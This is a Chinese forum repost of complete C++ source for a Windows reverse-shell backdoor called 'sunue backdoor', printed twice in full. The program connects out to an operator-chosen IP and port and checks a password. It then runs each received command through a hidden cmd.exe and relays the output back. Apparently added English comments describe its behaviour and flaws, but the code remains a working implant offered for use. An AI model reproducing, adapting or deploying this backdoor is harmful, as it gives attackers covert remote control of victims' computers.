来段后门,反弹的,高手略过哈(转自http://forum.darkst.com/read.php?tid=9537)
2007-10-18 13:56
VC++6 编译通过。
// reverse.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <WINSOCK.H>
#include <stdio.h>
#pragma comment (lib,"ws2_32.lib")
#define PASSSUCCESS "Password success!/n"
#define PASSERROR "Password error./n"
#define BYEBYE "ByeBye!/n"
#define WSAerron WSAGetLastError()
#define erron GetLastError()
VOID WINAPI EXEBackMain (LPVOID s);
//BOOL EXEBackMain (SOCKET sock);
/*
 * Entry point of the reverse-connect backdoor (analysis notes).
 *
 * argv[1] = destination IP as a dotted string (<= 15 chars), argv[2] =
 * destination TCP port, argv[3] = password (<= 16 chars). The process loops
 * forever: dial out to the listener, send a fixed banner, prompt for the
 * password until a matching line arrives, hand the socket to EXEBackMain on
 * a new thread, sleep 1 s and open the next outbound connection.
 *
 * Returns 0 on a usage error, on WSAStartup failure, or after the Clean label.
 *
 * NOTE(review): the `/n` sequences inside the string literals look like an
 * extraction artefact for the original escape sequence; as printed here the
 * strings contain a literal slash, not a newline.
 */
int main (int argc, TCHAR *argv[])
{
SOCKET sock=NULL;
struct sockaddr_in sai;
TCHAR UserPass[20]={0}; // password supplied on the command line
TCHAR PassBuf[20]={0}; // password bytes received from the peer
TCHAR PassBanner[]="/nPassword:";
TCHAR Banner[]="---------sunue backdoor---------/n"; // sent on every connect; a fixed network signature
if (argc!=4)
{
fprintf(stderr,"Code by sunue/n"
"Usage:%s [DestIP] [Port] [Password]/n",argv[0]);
return 0;
}
sai.sin_family=AF_INET;
// Validate the arguments and fill in the destination address.
// The IP string may be at most 15 characters; inet_addr's result is not checked.
if (strlen(argv[1])<=15)
sai.sin_addr.s_addr=inet_addr(argv[1]);
else
{
goto Clean;
}
// Port must satisfy 0 < port < 65535 (65535 itself is rejected by the strict comparison).
if (atoi(argv[2])>0&&atoi(argv[2])<65535)
sai.sin_port=htons(atoi(argv[2]));
else
{
goto Clean;
}
// Password is limited to 16 characters so it fits in UserPass[20].
if (strlen(argv[3])<=16)
strcpy(UserPass,argv[3]); // copy the password
else
{
goto Clean;
}
// Outer loop: one outbound connection attempt per iteration, forever.
while (TRUE)
{
WSADATA wsadata;
BOOL ThreadFlag=FALSE;
DWORD ThreadID=0;
int nRet=0;
nRet=WSAStartup(MAKEWORD(2,2),&wsadata); // Winsock init, repeated on every iteration
if (nRet)
{
return 0;
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (sock==INVALID_SOCKET)
{
goto Clean;
}
// Reverse connection: the implant dials out to the operator's listener.
nRet=connect(sock,(struct sockaddr*)&sai,sizeof (struct sockaddr));
if (nRet!=SOCKET_ERROR)
{
nRet=send(sock,Banner,sizeof (Banner),0);
if (nRet==SOCKET_ERROR)
{
goto Clean;
}
// Password loop: prompt, read up to 19 bytes, compare, repeat on mismatch.
while (TRUE)
{
nRet=send(sock,PassBanner,sizeof (PassBanner),0);
if (nRet==SOCKET_ERROR)
{
goto Clean;
}
nRet=recv(sock,PassBuf,sizeof (PassBuf)-1,0);
// Case-insensitive compare over the first strlen(UserPass) bytes only, so
// any input that starts with the password is accepted. PassBuf is not
// cleared between attempts.
if (strnicmp(PassBuf,UserPass,strlen(UserPass))==0)
{
ThreadFlag=TRUE;
break;
}
else
{
continue;
}
// Not reachable: both branches above leave the loop body first.
if (nRet==SOCKET_ERROR)
{
goto Clean;
}
Sleep(100);
}
if (ThreadFlag)
{
//EXEBackMain(sock);
// Hand the authenticated socket to the command-execution thread. The
// thread handle returned by CreateThread is discarded, and `sock` is
// overwritten by the next iteration while the thread still uses it.
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)EXEBackMain,
(LPVOID)sock,0,&ThreadID);
}
}
Sleep(1000); // 1 s between connection attempts (periodic outbound beacon)
}
Clean:
if (sock!=NULL)
closesocket(sock);
WSACleanup();
return 0;
}
/*
 * Command-execution thread: one spawned cmd.exe per received buffer.
 *
 * s: the authenticated SOCKET, passed through LPVOID by CreateThread.
 * Each iteration creates an anonymous pipe with an inheritable write end,
 * points the child's stdout/stderr at it, sends the prompt, receives one
 * buffer, runs "<system directory>//cmd.exe /c <received text>" through
 * CreateProcess with a hidden window, and relays whatever is read from the
 * pipe back over the socket. A buffer beginning with "exit" or "quit"
 * (case-insensitive, first 4 bytes) ends the session.
 *
 * Never returns normally: ends with ExitThread(0) after the Clean label.
 */
VOID WINAPI EXEBackMain (LPVOID s)
//BOOL EXEBackMain (SOCKET sock)
{
SOCKET sock=(SOCKET)s;
STARTUPINFO si;
PROCESS_INFORMATION pi;
HANDLE hRead=NULL,hWrite=NULL;
TCHAR CmdSign[]="/nsunue://>"; // interactive prompt; a fixed string visible in traffic
while (TRUE)
{
TCHAR MsgError[50]={0}; // error-message buffer (never used)
TCHAR Cmdline[300]={0}; // command line handed to CreateProcess
TCHAR RecvBuf[1024]={0}; // bytes received from the peer
TCHAR SendBuf[2048]={0}; // child output read from the pipe
SECURITY_ATTRIBUTES sa;
DWORD bytesRead=0;
int ret=0;
sa.nLength=sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor=NULL;
sa.bInheritHandle=TRUE; // pipe handles are inheritable by the child
// Create the anonymous pipe. A new pair is created every iteration; the
// previous hRead is overwritten here without being closed.
if (!CreatePipe(&hRead,&hWrite,&sa,0))
{
goto Clean;
}
si.cb=sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.hStdError=hWrite;
si.hStdOutput=hWrite; // the child's (cmd.exe) output is written into the pipe
si.wShowWindow=SW_HIDE;
si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
GetSystemDirectory(Cmdline,sizeof (Cmdline)); // system directory becomes the command-line prefix
strcat(Cmdline,"//cmd.exe /c "); // append the interpreter
ret=send(sock,CmdSign,sizeof (CmdSign),0); // send the prompt to the peer
if (ret==SOCKET_ERROR)
{
goto Clean;
}
ret=recv(sock,RecvBuf,sizeof (RecvBuf),0); // receive the command; a full-size recv leaves no room for a terminator
// "exit" or "quit" closes the session (checked before ret is examined)
if (strnicmp(RecvBuf,"exit",4)==0||strnicmp(RecvBuf,"quit",4)==0)
{
goto Clean;
}
// socket error: treat as peer disconnected
if (ret==SOCKET_ERROR)
{
goto Clean;
}
// zero-length receive: prompt again
if (ret<=0)
{
continue;
}
Sleep(100); // optional pause
// Append the received text to form the full command. The bound passed is
// sizeof(RecvBuf) (1024), not the space remaining in Cmdline[300].
strncat(Cmdline,RecvBuf,sizeof (RecvBuf));
// Run the command: the child inherits the pipe write end. The handles in
// `pi` are never closed.
if (!CreateProcess(NULL,Cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
{
continue;
}
CloseHandle(hWrite); // drop our copy of the write end; presumably so ReadFile stops once the child exits
while (TRUE)
{
// Relay pipe contents to the socket until ReadFile fails
if (ReadFile(hRead,SendBuf,sizeof (SendBuf),&bytesRead,NULL)==0)
break;
send(sock,SendBuf,bytesRead,0); // send to the peer
memset(SendBuf,0,sizeof (SendBuf)); // clear the buffer
Sleep(100); // pause
}
}
Clean:
// release pipe handles
if (hRead!=NULL)
CloseHandle(hRead);
if (hWrite!=NULL)
CloseHandle(hWrite);
// release the socket
if (sock!=NULL)
closesocket(sock);
WSACleanup();
ExitThread(0);
//return 0;
}
// reverse.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <WINSOCK.H>
#include <stdio.h>
#pragma comment (lib,"ws2_32.lib")
#define PASSSUCCESS "Password success!/n"
#define PASSERROR "Password error./n"
#define BYEBYE "ByeBye!/n"
#define WSAerron WSAGetLastError()
#define erron GetLastError()
VOID WINAPI EXEBackMain (LPVOID s);
//BOOL EXEBackMain (SOCKET sock);
/*
 * Entry point of the reverse-connect backdoor (analysis notes).
 *
 * argv[1] = destination IP as a dotted string (<= 15 chars), argv[2] =
 * destination TCP port, argv[3] = password (<= 16 chars). The process loops
 * forever: dial out to the listener, send a fixed banner, prompt for the
 * password until a matching line arrives, hand the socket to EXEBackMain on
 * a new thread, sleep 1 s and open the next outbound connection.
 *
 * Returns 0 on a usage error, on WSAStartup failure, or after the Clean label.
 *
 * NOTE(review): the `/n` sequences inside the string literals look like an
 * extraction artefact for the original escape sequence; as printed here the
 * strings contain a literal slash, not a newline.
 */
int main (int argc, TCHAR *argv[])
{
SOCKET sock=NULL;
struct sockaddr_in sai;
TCHAR UserPass[20]={0}; // password supplied on the command line
TCHAR PassBuf[20]={0}; // password bytes received from the peer
TCHAR PassBanner[]="/nPassword:";
TCHAR Banner[]="---------sunue backdoor---------/n"; // sent on every connect; a fixed network signature
if (argc!=4)
{
fprintf(stderr,"Code by sunue/n"
"Usage:%s [DestIP] [Port] [Password]/n",argv[0]);
return 0;
}
sai.sin_family=AF_INET;
// Validate the arguments and fill in the destination address.
// The IP string may be at most 15 characters; inet_addr's result is not checked.
if (strlen(argv[1])<=15)
sai.sin_addr.s_addr=inet_addr(argv[1]);
else
{
goto Clean;
}
// Port must satisfy 0 < port < 65535 (65535 itself is rejected by the strict comparison).
if (atoi(argv[2])>0&&atoi(argv[2])<65535)
sai.sin_port=htons(atoi(argv[2]));
else
{
goto Clean;
}
// Password is limited to 16 characters so it fits in UserPass[20].
if (strlen(argv[3])<=16)
strcpy(UserPass,argv[3]); // copy the password
else
{
goto Clean;
}
// Outer loop: one outbound connection attempt per iteration, forever.
while (TRUE)
{
WSADATA wsadata;
BOOL ThreadFlag=FALSE;
DWORD ThreadID=0;
int nRet=0;
nRet=WSAStartup(MAKEWORD(2,2),&wsadata); // Winsock init, repeated on every iteration
if (nRet)
{
return 0;
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (sock==INVALID_SOCKET)
{
goto Clean;
}
// Reverse connection: the implant dials out to the operator's listener.
nRet=connect(sock,(struct sockaddr*)&sai,sizeof (struct sockaddr));
if (nRet!=SOCKET_ERROR)
{
nRet=send(sock,Banner,sizeof (Banner),0);
if (nRet==SOCKET_ERROR)
{
goto Clean;
}
// Password loop: prompt, read up to 19 bytes, compare, repeat on mismatch.
while (TRUE)
{
nRet=send(sock,PassBanner,sizeof (PassBanner),0);
if (nRet==SOCKET_ERROR)
{
goto Clean;
}
nRet=recv(sock,PassBuf,sizeof (PassBuf)-1,0);
// Case-insensitive compare over the first strlen(UserPass) bytes only, so
// any input that starts with the password is accepted. PassBuf is not
// cleared between attempts.
if (strnicmp(PassBuf,UserPass,strlen(UserPass))==0)
{
ThreadFlag=TRUE;
break;
}
else
{
continue;
}
// Not reachable: both branches above leave the loop body first.
if (nRet==SOCKET_ERROR)
{
goto Clean;
}
Sleep(100);
}
if (ThreadFlag)
{
//EXEBackMain(sock);
// Hand the authenticated socket to the command-execution thread. The
// thread handle returned by CreateThread is discarded, and `sock` is
// overwritten by the next iteration while the thread still uses it.
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)EXEBackMain,
(LPVOID)sock,0,&ThreadID);
}
}
Sleep(1000); // 1 s between connection attempts (periodic outbound beacon)
}
Clean:
if (sock!=NULL)
closesocket(sock);
WSACleanup();
return 0;
}
/*
 * Command-execution thread: one spawned cmd.exe per received buffer.
 *
 * s: the authenticated SOCKET, passed through LPVOID by CreateThread.
 * Each iteration creates an anonymous pipe with an inheritable write end,
 * points the child's stdout/stderr at it, sends the prompt, receives one
 * buffer, runs "<system directory>//cmd.exe /c <received text>" through
 * CreateProcess with a hidden window, and relays whatever is read from the
 * pipe back over the socket. A buffer beginning with "exit" or "quit"
 * (case-insensitive, first 4 bytes) ends the session.
 *
 * Never returns normally: ends with ExitThread(0) after the Clean label.
 */
VOID WINAPI EXEBackMain (LPVOID s)
//BOOL EXEBackMain (SOCKET sock)
{
SOCKET sock=(SOCKET)s;
STARTUPINFO si;
PROCESS_INFORMATION pi;
HANDLE hRead=NULL,hWrite=NULL;
TCHAR CmdSign[]="/nsunue://>"; // interactive prompt; a fixed string visible in traffic
while (TRUE)
{
TCHAR MsgError[50]={0}; // error-message buffer (never used)
TCHAR Cmdline[300]={0}; // command line handed to CreateProcess
TCHAR RecvBuf[1024]={0}; // bytes received from the peer
TCHAR SendBuf[2048]={0}; // child output read from the pipe
SECURITY_ATTRIBUTES sa;
DWORD bytesRead=0;
int ret=0;
sa.nLength=sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor=NULL;
sa.bInheritHandle=TRUE; // pipe handles are inheritable by the child
// Create the anonymous pipe. A new pair is created every iteration; the
// previous hRead is overwritten here without being closed.
if (!CreatePipe(&hRead,&hWrite,&sa,0))
{
goto Clean;
}
si.cb=sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.hStdError=hWrite;
si.hStdOutput=hWrite; // the child's (cmd.exe) output is written into the pipe
si.wShowWindow=SW_HIDE;
si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
GetSystemDirectory(Cmdline,sizeof (Cmdline)); // system directory becomes the command-line prefix
strcat(Cmdline,"//cmd.exe /c "); // append the interpreter
ret=send(sock,CmdSign,sizeof (CmdSign),0); // send the prompt to the peer
if (ret==SOCKET_ERROR)
{
goto Clean;
}
ret=recv(sock,RecvBuf,sizeof (RecvBuf),0); // receive the command; a full-size recv leaves no room for a terminator
// "exit" or "quit" closes the session (checked before ret is examined)
if (strnicmp(RecvBuf,"exit",4)==0||strnicmp(RecvBuf,"quit",4)==0)
{
goto Clean;
}
// socket error: treat as peer disconnected
if (ret==SOCKET_ERROR)
{
goto Clean;
}
// zero-length receive: prompt again
if (ret<=0)
{
continue;
}
Sleep(100); // optional pause
// Append the received text to form the full command. The bound passed is
// sizeof(RecvBuf) (1024), not the space remaining in Cmdline[300].
strncat(Cmdline,RecvBuf,sizeof (RecvBuf));
// Run the command: the child inherits the pipe write end. The handles in
// `pi` are never closed.
if (!CreateProcess(NULL,Cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
{
continue;
}
CloseHandle(hWrite); // drop our copy of the write end; presumably so ReadFile stops once the child exits
while (TRUE)
{
// Relay pipe contents to the socket until ReadFile fails
if (ReadFile(hRead,SendBuf,sizeof (SendBuf),&bytesRead,NULL)==0)
break;
send(sock,SendBuf,bytesRead,0); // send to the peer
memset(SendBuf,0,sizeof (SendBuf)); // clear the buffer
Sleep(100); // pause
}
}
Clean:
// release pipe handles
if (hRead!=NULL)
CloseHandle(hRead);
if (hWrite!=NULL)
CloseHandle(hWrite);
// release the socket
if (sock!=NULL)
closesocket(sock);
WSACleanup();
ExitThread(0);
//return 0;
}